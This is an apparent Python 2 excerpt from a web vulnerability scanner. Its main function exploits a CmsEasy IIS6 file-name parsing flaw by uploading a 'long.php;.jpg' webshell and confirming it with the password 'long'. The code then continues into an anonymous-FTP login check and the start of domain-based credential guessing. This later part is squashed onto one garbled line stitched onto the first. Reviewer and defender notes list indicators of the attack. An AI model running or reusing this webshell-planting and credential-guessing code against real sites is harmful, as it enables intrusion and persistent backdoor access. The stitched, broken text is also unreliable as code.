    ``self.http_get`` confirms the stored path, it is checked with
    ``yijuhua_cs`` (password "long") and a second record is queued. Returns
    0 when no file name is found or on any exception, else None.

    NOTE(review): the original indentation is lost; the upload is assumed to
    be nested under the ``'jpg' in ...`` check - confirm.

    Defender note: the indicators are uploads to
    ``/celive/live/doajaxfileupload.php`` and files named ``*.php;.jpg``
    under ``/celive/uploadfiles/``.
    """
    try:
        data = "%s/celive/live/doajaxfileupload.php" % (url)
        if 'jpg' in self.URL_DZ(data):  # check whether JPG is supported
            EXP_list = [0, url, "exp", "exp_cmseasy_IIS6_jx", data, "", ""]
            # Record layout: [shell check succeeded 0/1, URL, severity,
            # vulnerability type, vulnerability address, password, remark].
            url_exp.put(EXP_list, 0.5)  # add to the result queue
            # Upload the file.
            # NOTE(review): the file handle is never closed.
            files = {'fileToUpload': open('long.php;.jpg', 'rb')}
            r = requests.post(data, files=files)
            data = r.text
            name = []
            try:
                p = re.compile(r'target=.+?>(.*?)</a>'
                               )  # e.g. [u'CELIVE-Q7duV0tNj8.php;.jpg']
                sarr = p.findall(data)  # take the first match
                name = sarr[0]
            except:
                return 0
            data = "%s/celive/uploadfiles/%s" % (url, name)
            # url[7:] drops the first 7 characters of url.
            # NOTE(review): presumably strips "http://"; an "https://" URL
            # would be cut in the wrong place - confirm.
            if self.http_get(url[7:],
                             "/celive/uploadfiles/" + name):  # verify that the address exists
                if yijuhua_cs("php", data, "long"):  # script type (ASP or PHP), URL, password
                    # check succeeded
                    EXP_list = [
                        1, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
                        "long", "webshell"
                    ]
                    url_exp.put(EXP_list, 0.5)  # add to the result queue
                else:
                    # check failed
                    EXP_list = [
                        0, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
                        "long", "webshell"
                    ]
                    url_exp.put(EXP_list, 0.5)  # add to the result queue
    except Exception, e:
        return 0
ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 except Exception, e: print e return 0 try: #判断是否为匿名账户 #anonymous 密码为空属于匿名账户 ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 ftpA.login("anonymous", "") #连接FTP EXP_list = [ 1, self.openurl[0], host, "FTP", "user:anonymous:password:"******"", "niming" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 return 0 except Exception, e: pass #print u"要扫描IP:",host, Adomain = host #域名www.baidu.com Bdomain = self.get_sdomain(Adomain) #域名拆解www.baidu.com->baidu.com Cdomain = self.get_ssdomain(Adomain) #域名拆解www.baidu.com->baidu Ddomain = "" #域名拆解www.baidu.com->wwwbaiducom for i, j in {'.': ''}.iteritems(): #去.符号 Ddomain = Adomain.replace(i, j) ################################### accounts = deque() #list数组 #准备 用户名和密码